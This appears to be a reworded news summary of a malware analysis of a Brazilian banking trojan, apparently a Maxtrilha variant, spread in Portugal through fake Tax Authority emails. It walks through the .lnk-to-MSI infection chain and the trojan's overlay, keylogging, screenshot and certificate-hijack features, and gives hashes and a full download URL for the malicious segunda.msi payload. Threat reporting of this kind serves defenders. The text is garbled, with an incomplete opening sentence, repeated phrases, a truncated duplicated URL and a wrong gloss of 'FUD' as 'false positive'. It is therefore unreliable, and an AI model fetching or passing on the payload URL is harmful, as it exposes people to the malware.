Since last month, a new form of a Brazilian virus has been affecting Internet users in Portugal (February 2022). An study of the artefacts and IOCs gathered from this campaign ,despite the fact that there are no notable changes in skill and when compared to other well-known trojans such as Maxtrilha, URSA and Javali.
- The trojan has been disseminated via phishing templates impersonating Tax services in Portugal.
- An HTML file downloads a .lnk file mascaraed of an MSI file that takes advantage of the LoL bins to execute an MSI file (segunda.msi).
- “segunda.msi” downloads and executes an EXE file that will drop the final stage.
- The trojan itself installs or modifies Windows trusted certificates, checks by opening windows to perform banking windows overlay to steal credentials, and can deploy additional payloads executed via DLL injection technique.
- The victims’ data is encrypted and sent to the C2 server geolocated in Russia.
To distribute the danger in the wild, the virus uses a template from the Portuguese Tax Services (Autoridade Tributária e Aduaneira). Maxtrilha, one of the most active trojans in Portugal, targets users with the same templates. We think this to be a new Maxtrilha variety. The majority of the artefacts collected matched a threat that was recorded in 2020 and is available here. This backs with the fact that Latin American threat organisations exchange code and TTP.
After extracting the ZIP file, a.lnk file disguised as an MSI (Faturas.lnk – 490f5b97a2754e50a7b67f2e00d2b43b) appears (Faturas.lnk – 490f5b97a2754e50a7b67f2e00d2b43b) appears. This file uses the “msiexec.exe” utility from Living of the Land to download and run another MSI file (segunda.msi – a4b91a89b8d2bff27ed1e13e334109be8b207d48a6284f529391c5391d96f141). The second MSI file runs in the background and downloads a fresh binary using this method. “https://cld.pt/dl/download/98c9149d-c4a5-4360-9097-90a12fa8d96f/sapotransfer-5d8a5a32728f4N2/segunda.msi?download=true” “https://cld.pt/dl/download/98c9149d-c4a5-4360-9097-90a12fa8d
The purpose of this binary is to download the malware’s last step. The binary was written in Visual Studio.NET and contains a lot of trash code that slows down and complicates analysis. The “FormPool” form, however, is activated somewhere within the garbage. It executes its “loader” after downloading two EXE files, the last malware stage (sear.exe).
The final malware stage is a Delphi file that looks like other Latin American trojans and contains the target banking strings. The main form, “fCentral,” is made up of five timers that will do various activities, including:
- looking for opened windows matching the hardcoded strings and launches the overlay windows attack when the victim accesses specific home banking portals
- collecting keystrokes and clipboard data (keylogger capabilities)
- capturing screenshots and webcam
- obtaining details about the machine, including hostname, AV, available drives, etc
- hijack Windows trusted certificates to provide a proxy channel between criminals and infected machines
Finaly the researchers concluded that ,” They were currently dealing with a rapid increase in Brazilian trojans. Each one has its own quirks, TTPs, and so on. Hackers create a false positive (FUD) situation that allows them to avoid discovery while affecting a vast number of people all over the world.“